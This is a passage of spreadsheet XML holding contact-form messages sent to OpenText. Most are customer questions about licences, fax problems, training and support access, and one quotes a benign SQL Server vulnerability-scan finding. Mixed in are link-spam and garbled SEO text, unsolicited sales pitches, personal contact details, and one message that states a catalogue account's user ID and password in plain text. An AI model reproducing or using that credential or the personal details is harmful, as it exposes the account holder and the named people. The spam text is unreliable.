    <t>Discuss on usage of Magellan for Airport Customer fronting apps and solutions</t>
  </si>
  <si>
    <t>Dear support,_x000D_
_x000D_
we are looking for appworks, gateway in-class courses. Could you suggest some?_x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I currently have an issue with the OpenText Chrome extension. The extension installs correctly, however when the user attempts to edit a file they receive a screen indicating to install the 64bit opentext client which is already installed, or to open with the WebDAV client which requires to be downloaded and installed._x000D_
_x000D_
Since the opentext 64bit client is already installed, how do I get the opentext extension for chrome to see the installed client?_x000D_
_x000D_
NOTE: The user is using Chrome via Citrix.</t>
  </si>
  <si>
    <t>interested in GDPR</t>
  </si>
  <si>
    <t>I need information on migrating TrustedLink and BizManager to a new IBM server. I've verified that our current versions are good at the new operation system (see support ticket SR 1-3083489604), but I need information on the process for migration and any relicensing that is needed due to a migration. Please advise. Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to find the account manager supporting DHS asap please. Thank you </t>
  </si>
  <si>
    <t>We sold OpenText  product to a client, client needs to be able to download the software. _x000D_
We were sent  OpenText Connect Registration, how do we proceed?</t>
  </si>
  <si>
    <t>Hi, would like to know more about BPM tool and possibly a demo,</t>
  </si>
  <si>
    <t>Please can you help me obtain a printed copy of the booklets for Hirundo Maris- Arianne Savall and Officium Novum? I have just purchased them both as mp3 files as that is my only way of listening to them. It would complete the experience to have a listing of the works and texts in the booklet. Thanks so much in advance, Jean</t>
  </si>
  <si>
    <t xml:space="preserve">Need rep that covers state government agencies in Tallahassee, Florida.  Have an opportunity to partner with one of my clients. </t>
  </si>
  <si>
    <t xml:space="preserve">Need Faxes to Email </t>
  </si>
  <si>
    <t>Do you have a solution for a small not for profit company that is international and needs a solution for online storage, database, and perhaps email, website management, and donation management?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hello, _x000D_
I'm with Accenture and I would like to get access to "My Support". My coworker "Hanna.Kleine@accenture.com" has an existing account from EMC which she took over to OpenText. She is linked to the following companies "Accenture Service GmbH München" and "Accenture LLP"._x000D_
I tried to get access over your website via "OpenText Connect Request Site Access". Unfortunately, I don't Product Line, End User Number, etc. _x000D_
Can you help me out here?_x000D_
Kind regards_x000D_
Jan Diekhoff_x000D_
</t>
  </si>
  <si>
    <t>i have a new computer and need to take open text editor off the old and put on the new,... how do we do this?</t>
  </si>
  <si>
    <t>Добрый день! ✈ Мы снизили тарифы на наши услуги в Москве , в Крыму, в Сочи, в Санкт Петербурге и других городах нашего присутствия.✈ Трансферы ✈, Экскурсии, ✈ Пассажирское обслуживание , Прокат авто и другие услуги. ✈ Ждем от Вас предложений о сотрудничестве !!! Наши цены Вас _x000D_
обрадуют !!! Бронируйте транспорт на Чемпионат мира по Футболу 2018 год. Раннее бронирование будет экономичнее, так как Чемпионат Мира по Футболу ✈ приходится и на сезон летних туров! Ждем ваших предложений. _x000D_
 _x000D_
С Уважением, Александр _x000D_
http://www.abba-trans.com _x000D_
http://footballworldcup2018.org _x000D_
☎ тел: 8800-550-63-66 ( многоканальный телефон ) _x000D_
☎ тел : +7(978)940-82-46 _x000D_
WhatsApp   Viber  ;+7(978)940-82-46 _x000D_
e-mail: info@abba-trans.com</t>
  </si>
  <si>
    <t>Filling out form for Belk and need to know: Name utilized on Open Text/GXS Catalog.  We are listed as Poly Commodity in GXS.  Is that what I tell them?  Or Royal Heritage Home?  They also need EDI VEN ID.  What # is  that?  I have tried calling GXS and left 2 messages and have not heard back.  Need to advise Belk ASAP.  Thank you.</t>
  </si>
  <si>
    <t>We have bought 5 licenses of Brava! Desktop CXL 16.2. But in the email woth the license information (Software ID / Software PIN) it informas me I need to go to Accounts - Activiation/Keys menu but I cannot find that. I have created an account now on Opentext.com. How can I activate the licenses we have bought ?_x000D_
Thanks and regards, Matt</t>
  </si>
  <si>
    <t xml:space="preserve">we need data entry projects , epub , xml and html 5 coversion works . if you are having means please give it to us . we will do as quality </t>
  </si>
  <si>
    <t xml:space="preserve">i need to add a new company prefix to my active catalog. PI355A for PIVOTAL PARTNERS LLP (127705576917) </t>
  </si>
  <si>
    <t>Looking for an appropriate enterprise management solution for Relocation Industry. Something that can integrate with our service engine.</t>
  </si>
  <si>
    <t>Seeking to schedule time to gain more knowledge about your product eDocs for Maritz.</t>
  </si>
  <si>
    <t>FYI the link to download the success story isn't working on this page: https://www.opentext.com/customer-stories/customer-story-detail?id=1353</t>
  </si>
  <si>
    <t xml:space="preserve">I have tried to send faxes and they sit in my que saying scheduled to send but never actually send. </t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
Are you looking for an opt-in email list of Supply Chain and Logistics Professionals? _x000D_
                                                                                                             _x000D_
If so, you are at the right place. Please let me know your requirement to get a quote and few sample contacts at no cost._x000D_
_x000D_
Thanks_x000D_
Alvin Bert_x000D_
Inside Sales_x000D_
V3 Data_x000D_
alvin@v3dataintel.com</t>
  </si>
  <si>
    <t>Can I get a quote for one desktop license of what I used to call Brava?  I assume it's now called OpenText?  Thanks</t>
  </si>
  <si>
    <t>Geachte heer/ mevrouw,_x000D_
_x000D_
We zijn aan het onderzoeken wat voor ons de mogelijkheden zijn om onze huidige AP Solution te gaan vervangen. We zouden graag in contact komen met de persoon die ons hierin verder kan informeren. Tevens zouden wij jullie graag uit willen nodigen bij ons op kantoor om een demonstratie te komen geven betreffende de mogelijkheden van jullie producten._x000D_
We zijn hierbij op zoek naar zowel de scanning software als het gedeelte voor factuurverwerking. (Invoice Capture Centre scanning &amp; Open Text Vendor Management workflow?)_x000D_
_x000D_
Zou u mij svp in contact kunnen brengen met de persoon die ons hierbij verder kan helpen?_x000D_
Waarvoor bij voorbaat dank._x000D_
_x000D_
Met vriendelijke groet,  _x000D_
Leonie van der Ark</t>
  </si>
  <si>
    <t>I have 2 training invoices to pay but I am unable to pay online using my corporate credit card. The message comes back declined. How else can I supply my credit card to pay the fees, please advise. Thanks.</t>
  </si>
  <si>
    <t>Engineering Client Who requires document management software with emphasis on drawings</t>
  </si>
  <si>
    <t>Hi, we have the following vulnerability on our Rightfax server (info below) - are we okay to uninstall the problematic (unsupported)version and just leave SQL 2014 in place? More info on the vulnerability and our rightfax version numbers etc below:_x000D_
_x000D_
_x000D_
Description:	According to its self-reported version number, the installation of Microsoft SQL Server_x000D_
on the remote host is no longer supported._x000D_
_x000D_
Lack of support implies that no new security patches for the product will be released by_x000D_
the vendor. As a result, it is likely to contain security vulnerabilities._x000D_
_x000D_
Solution:	Upgrade to a version of Microsoft SQL Server that is currently supported._x000D_
_x000D_
Solution Copyright SureCloud Ltd 2017_x000D_
_x000D_
Latest Discovery:	The following unsupported installations of Microsoft SQL Server were_x000D_
detected :_x000D_
_x000D_
Installed version : 12.0.2000.8 (2014) Express Edition_x000D_
Install path : E:\Program Files\Microsoft SQL_x000D_
Server\MSSQL12.RIGHTFAX\MSSQL\Binn_x000D_
Minimum supported version : 12.0.4100 (2014 SP1)_x000D_
_x000D_
When I look under 'Programs' we have MS SQL Server 2008 Setup Support Files, SQL Server 2012 Native Client, and SQL Server 2014 (64 Bit) installed, all on the same box (I believe one of your consultants installed all of this for us on 24th jan this year). We are using Rightfax product suite 10.6.3.527</t>
  </si>
  <si>
    <t>Hello and Good Day_x000D_
_x000D_
I am Max Alias jitesh,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Max Alias Jitesh</t>
  </si>
  <si>
    <t>Please provide a contact email as Societe Generale are launching a RFI on KYC Document Management</t>
  </si>
  <si>
    <t>Team, Could you please let me know the different levels of certification for EMC Documentum and its corresponding prices. Thanks</t>
  </si>
  <si>
    <t>Question: Does the Open Text Host Mainframe emulator also allow automation with VBA or another script?</t>
  </si>
  <si>
    <t>Need a solution to scrap tetx off scanned government issued Identification Documents which we use when enrolling people into our system._x000D_
_x000D_
Let me know if your solutions can provide this._x000D_
_x000D_
If you need more info let me know._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Need access due the ASN tracebility</t>
  </si>
  <si>
    <t>Hello !_x000D_
Greetings from PIXERIO ! _x000D_
Well , we are on the verge of expansion and in this regard i  take this opportunity  approaching your esteemed organization as we are seeking to team up with an Canada  based Software  services company  that echoes our company’s values, innovative solutions and quality of our service to our clients and  this will help you to be a part of Silicon Valley of India’s  vibrant knowledge based society.  _x000D_
A Brief Introduction to our company : Pixerio Solutions Private Limited, is a leading service provider of creative services  as well as innovative solutions  in various technologies like customer’s Brand &amp; Identity, Cloud Solutions , Web Design  &amp; Development, Graphics &amp; Multimedia, Education ( E-learning solutions )  ERP ,  Content Development , Software Design and development , Sharepoint solutions , Management systems,   virtualization,  Digital Marketing,  2D &amp; 3D Animations,  e-Commerce ,CRM ,  product engineering ,  Mobile Applications  Development , Advertisements, Event Management and more.  PIxerio Solutions Private Limited ,  is a one stop shop offering more than 50 different services that encompass the entire spectrum of creative media. _x000D_
The mission and vision of  Pixerio Solutions Private Limited are to achieve the following objectives,  _x000D_
1.	Delivering high-value IT services and solutions that are relevant to segments of national and International importance_x000D_
2.	Building and sustaining local and regional IT delivery and domain expertise in Education and  IT services _x000D_
For more details and insight about Pixerio Solutions Private Limited  various service offering , please  feel free to visit our corporate website on http://www.pixerio.com/.  _x000D_
Once a response is received from your company further engagement can be facilitated via skype.  _x000D_
A response within 7 days of this mail would be greatly appreciated.  _x000D_
Thank you for your time and we look forward for a possible business association in the not too distant  future ! _x000D_
A</t>
  </si>
  <si>
    <t>Hi There, Tried to click the GXS support but the link is not working. Contacting because username and password used to signin in https://catalogue.gxs.com is not working anymore. Network ID is "CS1442", User ID is "CS1442A" and password is "ekdhbh915". this password was received yesterday because we clicked reset password in catalogue because previous password was not working as well. if you are not the right person to be asked please send me correct email address who can help me out. Thanks and have a good day!</t>
  </si>
  <si>
    <t>A good friend of us referred OpenText to us. We were looking for a customer relationship management software for our start up business. We would like to find a product that is most suitable and meets our budget.</t>
  </si>
  <si>
    <t>Training course 4-0140 OpenText Content Server IDE (CSIDE) Fundamentals v16_x000D_
_x000D_
The course page only lists three dates in January, April and March of 2018, all overseas. Are no North American options available, or preferably virtual training, and at earlier dates? I'm looking at the Content Server Solution Developer Certification Exam v16 and would like to have all the prerequisites completed by December if possible. _x000D_
_x000D_
Alternatively, could I get credit for a CSIDE course I took at Enterprise World 2015 in Las Vegas? It was only a one day course, but I have worked extensively with CSIDE since then._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Uwe W. Radu_x000D_
Tennessee Valley Authority</t>
  </si>
  <si>
    <t>Hi, I would like to know if there are job vacancies for  ASP.Net, SQL and Ajax technologies.</t>
  </si>
  <si>
    <t xml:space="preserve">Does opentext have a product that integrates with Content Sever for storage cloud, archive file format preservation, archive management with auditable provenance for every file and a secured environment that is compliant with ISO 27001:2013?  </t>
  </si>
  <si>
    <t>I have lost access to support for our customer Sportsbet to raise a ticket. Can I please have my support access back?</t>
  </si>
  <si>
    <t>I am in need of the My Documentum Desktop application for both the Mac and PC.  Is there any way I can get a link to download the software?</t>
  </si>
  <si>
    <t>[url=http://timecalc.ru/][img]http://internetaccessmonitor.ru/uploads/posts/2016-09/1474377415_32-32_system_dlya_dll186.png[/img][/url] _x000D_
Всем привет, уже третий день не могу поставить DirectX - пробовал установить DLL тдельно, но не помогает, пишет что у меня 32-х битная система. Что делать?</t>
  </si>
  <si>
    <t>I currently have MFT licensing for 50 users. I would like to budget for more and wanted to ball park the cost for additional 50.</t>
  </si>
  <si>
    <t>doing work on brs 10.1 and netanswer and having trouble getting netanswer to work with a new database. Any chance I can see a netanswer guide pdf?</t>
  </si>
  <si>
    <t>interested in knowing more of provision for EA modelling</t>
  </si>
  <si>
    <t xml:space="preserve">I am working on an inventory of maintenance licenses and I wanted to see if you could provide me a recent invoice so I can add to my records and allow me to move forward in  establishing a plan for renewals going forward. Thanks! </t>
  </si>
  <si>
    <t>Последние новости  Армении здесь [url=http://lratvakan.com/]lratvakan.com[/url]</t>
  </si>
  <si>
    <t>Удивительно, но смертельно больные люди редко впадают в уныние. Об этом свидетельствуют американские ученые, передает «Рамблер Новости». Эксперты исследовали посты в соцсетях, написанные смертельно больными людьми. Ученых в особенности интересовали последние слова умирающи, подробнее об этом читайте на сайте [url=http://shoptrip.ru]shoptrip.ru[/url]</t>
  </si>
  <si>
    <t>Requesting a quote for OpenText Exceed._x000D_
Please send me a quote so we can put in a Purchase Order._x000D_
https://www.opentext.com/what-we-do/products/specialty-technologies/connectivity/exceed_x000D_
Thank you!</t>
  </si>
  <si>
    <t>BI and Reports using iHub and your Designer</t>
  </si>
  <si>
    <t>Hello, can someone please contact me for a overview of you Extream Output Module. We are currently working with a vendor on a solution and would like to hear what Opentext may be able to provide. Thanks</t>
  </si>
  <si>
    <t>Was not provided with fax number</t>
  </si>
  <si>
    <t xml:space="preserve">Digital Assets management soultion proposal. Please contact us._x000D_
_x000D_
Thank you </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested to acquire an Opt-In email list of  Healthcare Professionals /Hospital decision makers  from your target region? _x000D_
_x000D_
To name few: 1.6 million contacts of Physicians/Doctors with over 120+ specialties, Medical Directors, CTOs/CIOs, Clinical Directors, Hospital procurement professionals, Hospital Administrators, Facilities etc., _x000D_
_x000D_
Should you be targeting any specific list? Please let me know your requirement, I will get back to you with counts and pricing details._x000D_
_x000D_
Target Industry: ____________; Geography: ____________; Job Title (Any): ________________:_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
Hello, we are a young social innovators group from St Angela’s College Cork. Y.S.I is Ireland’s largest social awareness, active citizenship and education programme for 15 to 18 year old teenagers. Its aim is to get young people involved in social change and the improvement of the lives of others. As part of YSI teenagers across Ireland get to take part in action projects that will improve a problem they see in their society. _x000D_
_x000D_
We are a group of transition year students. Our chosen social issue is homelessness as it is topical right now. Our group name is S.H.I.N.E. (Supporting Homeless in Need Every day) .We aim to ease the lives of those living on the streets of Cork. We know that ‘helping one person won’t change the world, but for one person their world will be changed’._x000D_
_x000D_
Within our project we are doing different things for the homeless people on the streets of Cork. We are making a map of coffee shops around Cork that do the ‘pay it forward’ system. This map will be available to everyone whether you are paying it forward or receiving a coffee. It will hopefully be available in both hard copy and as an app. The ‘pay it forward’ system is so that homeless people can go into a coffee shop and receive a free coffee that has been paid for by somebody else who went to that coffee shop and paid for an extra coffee for someone who needs it. The second thing we are doing is starting a campaign/petition to make social welfare available to the homeless. We are also doing a winter wear clothes appeal for socks, gloves, hats etc. _x000D_
_x000D_
The final thing we are doing is where we feel you can help. We are going to create ‘bundles of joy’ for the homeless in Cork. These are bags full of essential that will be given out to the homeless people on the streets of Cork. We would greatly appreciate a donation to help fund our blessing bags as there is great difficulty trying to raise these funds ourselves. Your funds will make a massive difference to the ho</t>
  </si>
  <si>
    <t>Please send me the email address of the sales team. I have tried sales@opentext.com but have not received a reply. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">We are reaching out to gain access to OpenText Process Suite Platform in order to complete 508 Testing for the Department of Veterans Affairs.  </t>
  </si>
  <si>
    <t>I would like to introduce my company to you:_x000D_
_x000D_
Portable Insights, Inc. is a Warwick, Rhode Island-based marketing and opinion research company.  We conduct telephone and online marketing research as well as focus group and IDI recruitment for clients in the US and abroad. My colleagues and I are research industry veterans and we would appreciate an opportunity to work with you._x000D_
_x000D_
I wanted to reach out to you to find out how I could get an opportunity to work on your research projects such as any overflow research you may have or any projects that you require outside assistance on. _x000D_
_x000D_
Please feel free to reach out with any questions or needs. I appreciate any opportunity to earn your business. _x000D_
_x000D_
Best regards,_x000D_
Francine</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, today I have create account on Opentext Site, but I don't have access on link for download software._x000D_
_x000D_
This are information from my Boss Andrea Onofri for Renewal Notice_x000D_
_x000D_
Reference Number: RC224607_x000D_
Contract Number:    A243570_x000D_
_x000D_
Thanks for support_x000D_
</t>
  </si>
  <si>
    <t>Is there a way to save search &amp; size of columns and rows in DM. I have an Employee that searches a document and when the info comes up and she exports it to pdf it reformats it be squished where the letters are stacked on top of each other. she has to manually resize in dm then when she exports its fixed.</t>
  </si>
  <si>
    <t xml:space="preserve">I have submitted a request before for information and am sending again as I need some information before we go forward with expanding our RightFax deployment.  I need to know if we can use our existing Enterprise license to bring a new server instance up in our Agency.  _x000D_
_x000D_
Can the new Instance be separate from the existing in regards to what groups are setup?  _x000D_
_x000D_
Will the new server be seeing the same groups as the already existing one or will it be able to have separate groups that don't cross over?_x000D_
_x000D_
Can the new instance use the Dialogic Virtual Fax board of the existing service or will a new one need to be setup?_x000D_
_x000D_
Lastly, is there any module that can be added that can detect Protected Health Information or other secure language?_x000D_
</t>
  </si>
  <si>
    <t>Interested in RightFax product.</t>
  </si>
  <si>
    <t>We have a project underway that requires an image intake and processing component. We believe Data Capture Centre may be a possible fit. I would like to discuss with a sales or technical person ASAP._x000D_
Please contact with the provided contact details._x000D_
_x000D_
Rob</t>
  </si>
  <si>
    <t>Hello, it seems the pre recorded webinars located at http://www.opentext.com/events-and-webinars does not exist anymore as there is just about 6 available from 2013 &amp; 2015.</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern,_x000D_
My name is Alex Guerreiro and I am the Event Assistant for the Mississauga Marathon, being held May 4-6, 2018. This year’s event will mark 15 Years Running, and we are very excited for the Spring! I am reaching out to invite Open Text Corporation to participate in the 2018 Full Marathon Relay Challenge, an exciting team building activity!_x000D_
Teams are comprised of up to five members who will complete the Full Marathon course together, relay style. The first four legs are made up of 8KM, while the final leg is 10.2KM. All teams will complete the same route as the Full Marathon participants on Sunday, May 6th beginning at 7:30AM. _x000D_
All team members receive an official race t-shirt, bib, Swag Bag and finisher’s medal, in addition to FREE shuttles to each relay exchange point and access to the post-race food line! There is also opportunity to fundraise for any of the 2018 Mississauga Marathon’s official charity partners, or a charity affiliated with your workplace. More information on the Scotiabank Charity Challenge can be found at www.mississaugamarathon.com/charity-challenge. _x000D_
This is a great time to enter a team, as early bird prices are available until November 1st! For just $200, your team can enter to compete against other businesses in the GTA in the Full Marathon Relay Challenge! Whether you host an internal challenge between departments, or use training as a way to incorporate fitness and healthy living into the workplace, this is a guaranteed team building experience!_x000D_
If you have any questions, please feel free to reach out to me directly. Attached is our information brochure, if you would like to print/distribute around the workplace. All information related to the Full Marathon Relay Challenge can be found at www.mississaugamarathon.com/marathon-relay. _x000D_
Thank you,_x000D_
</t>
  </si>
  <si>
    <t>Logging into my portal and trying to setup users for Fax2Mail and can remove numbers but am not able to add anymore numbers/reuse numbers for correct area codes.</t>
  </si>
  <si>
    <t>INOVAÇÃO EM GESTÃO DE PESSOAS</t>
  </si>
  <si>
    <t>We have a contract with you company for sending out faxes. Our user ID is DE/INFOPLAZA. We would like to terminate the contract. Can you please advise what we should do. Looking forward to hear! Best regards, Menno Bom</t>
  </si>
  <si>
    <t>Hello, _x000D_
I lost my granting for the knowledge base in opentext portal._x000D_
As a partner I should be allowed to access to documentation/patches/discussion._x000D_
Particulary I need access to VIM folder: https://knowledge.opentext.com/knowledge/llisapi.dll?func=ll&amp;objId=3551166_x000D_
Thx in advance, _x000D_
Vincent Tanguy</t>
  </si>
  <si>
    <t>I would be most grateful if you could assist. I am trying to pull together information as to how LiveLink could be configured so that elements of it were accessible on one side of the firewall, whilst the majority of the system sat safe behind the firewall._x000D_
the aim would be to allow partner organisations to place document into LiveLink, and retrieve documents from LiveLink, without compromising the firewall and data security._x000D_
Can you advise me if there are any papers or similar on this matter?_x000D_
I would appreciate responses via mail, rather than by phone._x000D_
Kind Regards_x000D_
_x000D_
_x000D_
Stuart</t>
  </si>
  <si>
    <t xml:space="preserve"> Hartz Assorted HartzRunningfRodentCatToy Hayneedle Your browser indicates if you've visited this link They may not know why thr Hartz Assorted HartzRunningRodentCatToyis shaking and vibratint across the floor, but thery'll know that    More results.&lt;br&gt; Find great dealss on eBay for desensitizing spray for men and stud 100 spray. Shop with  Buy Stud 100 Desensitizing Spray for Men 12g Online at ... &lt;/strong&gt;.&lt;br&gt;  _x000D_
 [url=http://9gecurcor-i99.soup.io/]Pee on the floor[/url] [url=http://9glacidli-reqd.soup.io/]Little toy cats[/url]  _x000D_
 Whyis mycaturinating inappropriately? - RSPCA Australia ... Your browser indicates if you've visited this link Whyis myctaurinating inappropriately? Article ID: 251 ... They may also "mark" spots in thehousewith their urine as a means of marking their territory.   More results.&lt;br&gt; &lt;strong&gt;AngryCatSounds  Effects  Sound Bites  Sound Clips from ... Your browser indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt;  _x000D_
toy caat figuers _x000D_
 _x000D_
 Howtoremovecaturine- CozyCatFurniture Your browser indicates if you've visited this link Removingcaturinefromyolur carpet can be one of the most difficult cleaning tasks, ince it produces an especially persistent, unpleasant odor. /blog/how-to-remove-cat-urine More results.&lt;br&gt; &lt;h4&gt;CatUrine : Clean &amp; RemoveCatUrinein Carpet FREE Recipe Your browser indicates if you've visited this  : Professional Grade Dog andCatUrineStain and ... Your browser indicates if you've visited this link There are 5 different type stains created byurine . Thebestway to remove each varies. How ... Gallon Size Enzymatic Stain Remover-Remove Dog- CatUrineSmell Froim ...   More results.&lt;br&gt;  _x000D_
  [url=http://28mabapce-mul2.soup.io/]Natural cat repellent vinegar[/url] [url=http://87riatiacrim-pey3.soup.io/]How to remove urine smell from a mattress[/url]  _x000D_
 Need tips and adviices on how to geturinespots out of yourcarpet ? ... more about how to remove dogurinefromcarpetand don't  ..&lt;br&gt; Find and save ideas about Cleaningcaturine on</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;h3&gt;CatLitterBoxFurnitureOut of Sight LitterBoxCabinet Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt; Transform into a gentle kitty with thisWhiteCatEars and Tail set. It's such a quick and easy costume for those with little to no time. Trust us once it's on you'll  , Eye Colours and Deafness - MESSYBEAST Your brolwser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
 [url=http://graphafid-sujr.soup.io/]Bengal cat breeders pa[/url] [url=http://taufratvinekp.soup.io/]Spray paint dealers[/url]  _x000D_
 Dog Peeing in Its OwnBed ThriftyFun Your browser indicates if you've visited this link There are a number of reasons your pet may be wetting his or herbed . This is a guide about dog peeing in its ownbed .   More results.&lt;br&gt; Adaptil for dogs Your broweser indicates if you've visited this link Adaptil Helps Dogs and Puppies Settle, Train/Learn, Stay Home Alone and Cope with Firework Fear. Get Dog Behaviour Advice &amp; Tips. Best Behaviours   /uk/ More results.&lt;br&gt;  _x000D_
about bengal cats _x000D_
 _x000D_
 editSprayinjgurineeverywhere and you  have the option ... however, have anything to do whatsoever withsprayingall over the goddamn place InMen Health  Patient Your browser indicates if you've visited this link&lt;/strong&gt;.&lt;br&gt; Will you be able totelloyourcat'sbreed ? Take a look at these tips and try to know whatbredesyou  - FAQ - UC Davis Veterinary Genetic Laboratory Your browser indicates if you've visited this link&lt;/u&gt;.&lt;br&gt;  _x000D_
  [url=http://2ulpetoyonj.soup.io/]Petsafe ssscat cat spray[/url] [url=http://301canmodekepm.soup.io/]Low cost spay clinic[/url]  _x000D_
 Yes, It's Possible to Clean YourMattress- Esquire Your browser indicates if you've visited this link ... so today we'll cover what to do about other iknds of stains that commonly occur on mattresses, like bllood andurine .  Esquire ...  /style/advice/a42934/clean-mattress/ More results.&lt;br&gt; &lt;u&gt;HowtoGetRidofCatSpraySmell -  Your browser indicates if yoh've visited this link&lt;/u&gt;.&lt;br&gt;  _x000D_
gray and whitecat names _x000D_
 _x000D_
Causes a</t>
  </si>
  <si>
    <t>Hi, Statement is "Documentum is now Opentext"  (http://documentum.opentext.com/documentum/ ) - did Opentext aquire EMC Documentum? We have a customer who's running Documentum, and we want to migrate his environment to our data center (Germany =&gt; Germany). Current Documentum version is outdated. I want to know how Opentext (T-Systems is customer of Opentext) can support in migration the outdated version (using Archiving as well as the "e-room" functionality)._x000D_
_x000D_
Thank you for a short info via e-mail._x000D_
_x000D_
Regards_x000D_
Guido</t>
  </si>
  <si>
    <t xml:space="preserve">I'm waiting for a fax but did not arrived yet and the sender sent it 30 min ago </t>
  </si>
  <si>
    <t>Hi,_x000D_
We proudly introduce ourselves as a creative boutique that empowers brands to establish a potent place in their industry via Brand Management &amp; Digital Marketing. _x000D_
Did you know that businesses with strong Social Media presence generate 18% more revenue than the ones that don’t? People in big numbers are turning towards Social media platforms every day and businesses leave no stone unturned to capture their attention to generate more revenue. Generating new clients is important but old clients are Gold. You need to figure out where your target audience is hanging out on the internet – Is it Facebook, Twitter, Google+, Instagram or some other online nook._x000D_
We have wide expertise in handling accounts across a wide spectrum of industries viz., hospitality, e-commerce, health, real estate, entertainment, FMCG, consumer electronics, apparel, financial consultancy, publishers, authors and education sectors. Our Social media packages starts from $499/ month giving you the freedom from expensive digital marketing maintenance. _x000D_
Our Social Media experts would love to discuss your needs and suggest you best marketing approach. Revert back to this email and ask for a proposal or schedule a call and one of our Social media expert will reach out for a no obligation consultation. Please include your existing Social Media channels (If any) to make conversation much meaningful. _x000D_
We look forward to hearing from you._x000D_
Thanks &amp; Regards,_x000D_
Social Media Team</t>
  </si>
  <si>
    <t>Since upgrade I can no longer access my library</t>
  </si>
  <si>
    <t>Женские формы тела всегда привлекают мужчин, но не все женщины являются обладательницами красивой и пышной фигуры. Иногда, что бы достичь максимального эффекта, нужно хорошо попотеть над собственными формами в спортзале, но есть и другие, менее требовательные способы. Подробнее читайте на сайте [url=http://juliy.info]juliy.info[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
we are Business SW developer and we operate mainly in our region. We use also OpenText / Gupta as a developer tool. As we are familiar with the field, we would like to investigate our market, if your product "OpenText™ eDOCS DM" would be interesting/adequate for selling and implementing. That's why we would like to know more about pricing, APIs for integration with company's ERPs, about metamodel (its entities) and estimated training plans for us, as potential “provider of OpenText™ eDOCS DM"._x000D_
Best regards,_x000D_
Beno Krasovec_x000D_
</t>
  </si>
  <si>
    <t>finding vendor that fits our company requirement for Document Management System</t>
  </si>
  <si>
    <t>cannot access support for Exstream products, it was working before, but  from some reason I am unable to access my tickets, could you please solve it for me?</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
I am looking for a virtual or classroom based training in India for the below products:_x000D_
_x000D_
•	Content Services for SAP_x000D_
•	Archive Services for SAP_x000D_
•	Process Services for SAP_x000D_
_x000D_
Also other technology/products to integrate Documentum (more specifically D2) and SAP._x000D_
_x000D_
Please let me know if there are any courses available for these products or can a custom training session be arranged for these?_x000D_
_x000D_
Thanks_x000D_
Rajesh Mani _x000D_
+91 7550073804</t>
  </si>
  <si>
    <t>Could your Account Executive for Ausgrid please give me a call.  I would like to have a discussion on the OCR / VIM solution that OPENTEXT has implemented at Ausgrid.</t>
  </si>
  <si>
    <t>I am looking for information about the possibility of hosting the DAM on my own servers.  If that is possible, what are the system specs required to run the system?</t>
  </si>
  <si>
    <t>opentext training needed</t>
  </si>
  <si>
    <t>Details for support contract from opentext</t>
  </si>
  <si>
    <t>I am trying to download the Forrester Digital Asset Management 2016 review however on submitting the form it errors and asks for Industry to be entered. There is no field available to supply Industry. Please advise what I need to do._x000D_
_x000D_
Christine</t>
  </si>
  <si>
    <t>Problem converting fax body or cover sheet. Urgent. Physicians are not receiving reports. Please Early Wednesday morning.  TICKET # 3328603</t>
  </si>
  <si>
    <t>This matter is urgent. I need a phone call early Wednesday morning. No faxes went through. Problem converting fax body or cover sheet. Physicians need these reports.</t>
  </si>
  <si>
    <t>AECI is currently a customer of your “Brava” product line and we are also a former user of the ApplicationXtender product line from when it was part of OTG.  I am writing today to inquire about the costs and options for renewing our support with ApplicationXtender and upgrading the software/database to allow some of my users to access some old content that was managed with ApplicationXtender prior to 2011.  My records show that we utilized Application Extender version 4.20.50 and that our OTG customer ID was 7939888.</t>
  </si>
  <si>
    <t>Please send me your; W-9 Form in support of a renewal.</t>
  </si>
  <si>
    <t>Hello,_x000D_
Kohl's has asked us to share our catalog information. I am unable to find an account to access our catalog with Open Text. I can however log into a second portal that shows we are currently paying invoices to Open Text. Can you please advise how we can access our catalog?</t>
  </si>
  <si>
    <t>Our company recently signed agreement as Tier 2 reseller. I was already a registered user of your support site prior to this agreement which gave me limited access. As an experienced AX support agent I would like access to the ApplicationXtender suite support info for rendering support to our customer base already in place._x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t>continuing to have problems converting faxes. Ticket # 3328603 ID# 31407-12192</t>
  </si>
  <si>
    <t>Issuing an RFP for BPM solution. _x000D_
_x000D_
We are issuing an RFP for a BPM solution and wanted to inquire if OpenText is interested. If yes, please let me know the point of contact to submit the RFP to. We are an insurance company in Hartford, CT.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to access the knowledgebase and documentation for our RightFax.  I have completed the registration over and over and over again.  It continues to say that I have NOT confirmed the email.  I have only gotten the first email that states I am registered but I do not have access to My support, knowledgebase etc.  Our contract is with Advantage Support.  Please assist </t>
  </si>
  <si>
    <t>What version of OpenText RightFax supports Windows 10?</t>
  </si>
  <si>
    <t>This is the first time I have tried to login to OpenText support since the purchase of DCTM (I am a DCTM partner).  Apparently my email address is registered but I don't know the password and the reset password function returns an error.  Can you reset my password?  Thanks.</t>
  </si>
  <si>
    <t>We are looking for 10 licenses of Exceed, we are upgrading to the latest version. As a University, is there any volume discount or Educational discount that we can apply?</t>
  </si>
  <si>
    <t>I was sent a new FAXMAIL email but no number was contained within it.</t>
  </si>
  <si>
    <t>Rec'd link to reset password, but after entering a new one, a message is returned that the password update failed.</t>
  </si>
  <si>
